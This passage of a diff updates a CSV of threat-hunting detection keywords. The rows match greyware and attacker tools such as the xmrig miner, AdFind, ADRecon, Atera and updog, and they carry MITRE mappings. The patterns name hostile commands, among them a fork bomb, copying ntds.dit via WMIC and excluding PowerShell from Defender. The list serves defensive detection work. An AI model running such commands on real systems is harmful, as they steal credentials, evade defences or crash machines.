T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*/updog/archive/updog-*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*/xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*/xmrig.exe*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*/xmrig.git*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*:(){:I: &I*","greyware_tool_keyword","linux","fork bomb linux - denial-of-service attack wherein a process continually replicates itself to deplete available system resources slowing down or crashing the system due to resource starvation","T1499","TA0040","N/A","N/A","Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*\1.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\1.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" @@ -213,7 +213,7 @@ "*\9.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\9.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" "*\ADGet.exe*","greyware_tool_keyword","adget","gather valuable informations about the AD environment","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Discovery","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*\Angry IP Scanner.app*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*\Angry IP Scanner.app*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" "*\AppData\Local\Microsoft\CLR_*\UsageLogs\*.exe.log*","greyware_tool_keyword","cobaltstrike","If cobaltstrike uses execute-assembly there is a chance that a file will be created in the UsageLogs logs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\Procmon.exe*","greyware_tool_keyword","procmon","Procmon used in user temp folder","T1059.001 - T1036 - T1569.002","TA0002 - TA0006","N/A","N/A","Reconnaissance","N/A","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\Procmon64.exe*","greyware_tool_keyword","procmon","Procmon used in user temp folder","T1059.001 - T1036 - T1569.002","TA0002 - TA0006","N/A","N/A","Reconnaissance","N/A","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" @@ -226,9 +226,9 @@ "*\FreeFileSyncPortable_*.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\GoodSync-2*-*.log*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\GoodSync-vsub-Setup.exe*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" -"*\ipscan-*-setup.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" -"*\ipscan221.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" -"*\ipscan-crash.txt*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*\ipscan-*-setup.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*\ipscan221.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*\ipscan-crash.txt*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" "*\Ivy\Cryptor*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*\Ivy\Loader\*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*\keygen.exe*","greyware_tool_keyword","_","generic suspicious keyword keygen.exe observed in multiple cracked software often packed with malwares","T1204 - T1027 - T1059 - T1055 - T1060 - T1195","TA0005 - TA0002 - TA0011","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -271,7 +271,7 @@ "*\TEMP\AteraUpgradeAgentPackage\*","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\TEMP\ScreenConnect\*.ps1*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","screenconnect.com","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\tir_blanc_holiseum\*.exe*","greyware_tool_keyword","tir_blanc_holiseum","Ransomware simulation","T1486 - T1204 - T1027 - T1059","TA0040 - TA0002 - TA0005","N/A","N/A","Ransomware","https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware","1","0","N/A","4","6","N/A","N/A","N/A","N/A" -"*\updog-master\*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*\updog-master\*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" "*\Users\*\AppData\Local\GoodSync*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\Users\*\AppData\Local\Temp\*.megatools.cache*","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","9","","N/A","","","" "*\Users\Public\*.dmp*","greyware_tool_keyword","procdump","Dump files might contain sensitive data and are often created as part of debugging processes or by attackers exfiltrating data. Users\Public should not be used","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -280,18 +280,18 @@ "*\uTorrent\*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\utweb.exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\Windows\Prefetch\PSEXEC*","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*\WinRing0x64.sys*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*\xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*\xmrig.exe*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*\xmrig-6.20.0*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*\xmrig-master*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*08384f3f05ad85b2aa935dbd2e46a053cb0001b28bbe593dde2a8c4b822c2a7d*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*3b5cbf0dddc3ef7e3af7d783baef315bf47be6ce11ff83455a2165befe6711f5*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*\WinRing0x64.sys*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*\xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*\xmrig.exe*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*\xmrig-6.20.0*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*\xmrig-master*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*08384f3f05ad85b2aa935dbd2e46a053cb0001b28bbe593dde2a8c4b822c2a7d*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*3b5cbf0dddc3ef7e3af7d783baef315bf47be6ce11ff83455a2165befe6711f5*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*-443.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A" -"*4fe9647d6a8bf4790df0277283f9874385e0cd05f3008406ca5624aba8d78924*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*5575c76987333427f74263e090910eae45817f0ede6b452d645fd5f9951210c9*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*5a6e7d5c10789763b0b06442dbc7f723f8ea9aec1402abedf439c6801a8d86f2*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*99e3e313b62bb8b55e2637fc14a78adb6f33632a3c722486416252e2630cfdf6*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*4fe9647d6a8bf4790df0277283f9874385e0cd05f3008406ca5624aba8d78924*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*5575c76987333427f74263e090910eae45817f0ede6b452d645fd5f9951210c9*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*5a6e7d5c10789763b0b06442dbc7f723f8ea9aec1402abedf439c6801a8d86f2*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*99e3e313b62bb8b55e2637fc14a78adb6f33632a3c722486416252e2630cfdf6*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*aakchaleigkohafkfjfjbblobjifikek*","greyware_tool_keyword","ProxFlow","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*ac i ntds*\\127.0.0.1\ADMIN$\*","greyware_tool_keyword","wmic","The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Add-MpPreference -ExclusionProcess *\Windows\System32\WindowsPowerShell\v1.0\powershell.exe*","greyware_tool_keyword","powershell","Exclude powershell from defender detections","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" @@ -308,8 +308,8 @@ "*adfind.exe -sc trustdmp*","greyware_tool_keyword","adfind","query domain trusts with adfind","T1482 - T1018","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*adfind.exe*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*AdFind.zip*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://www.joeware.net/freetools/tools/adfind/usage.htm","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*ADRecon -OutputDir *","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","AD Enumeration","https://github.com/adrecon/ADRecon","1","0","greyware tool - risks of False positive !","N/A","5","487","83","2023-08-08T21:44:01Z","2018-12-15T13:00:09Z" -"*ADRecon.ps1*","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","AD Enumeration","https://github.com/adrecon/ADRecon","1","1","greyware tool - risks of False positive !","N/A","5","487","83","2023-08-08T21:44:01Z","2018-12-15T13:00:09Z" +"*ADRecon -OutputDir *","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","AD Enumeration","https://github.com/adrecon/ADRecon","1","0","greyware tool - risks of False positive !","N/A","5","488","83","2023-08-08T21:44:01Z","2018-12-15T13:00:09Z" +"*ADRecon.ps1*","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","AD Enumeration","https://github.com/adrecon/ADRecon","1","1","greyware tool - risks of False positive !","N/A","5","488","83","2023-08-08T21:44:01Z","2018-12-15T13:00:09Z" "*Advanced IP Scanner*","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1595 - T1046","TA0007 - TA0011","N/A","Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Reconnaissance","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*advanced_ip_scanner*","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1595 - T1046","TA0007 - TA0011","N/A","Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Reconnaissance","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Advanced_IP_Scanner*.exe*","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1595 - T1046","TA0007 - TA0011","N/A","Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Reconnaissance","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -335,11 +335,11 @@ "*AteraAgent*AgentPackageRunCommandInteractive.exe*","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*attrib +s +h desktop.ini*","greyware_tool_keyword","attrib","NTLM Leak via Desktop.ini","T1555.003 - T1081.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*b4ldr/nse-scripts*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" -"*bad client public DH 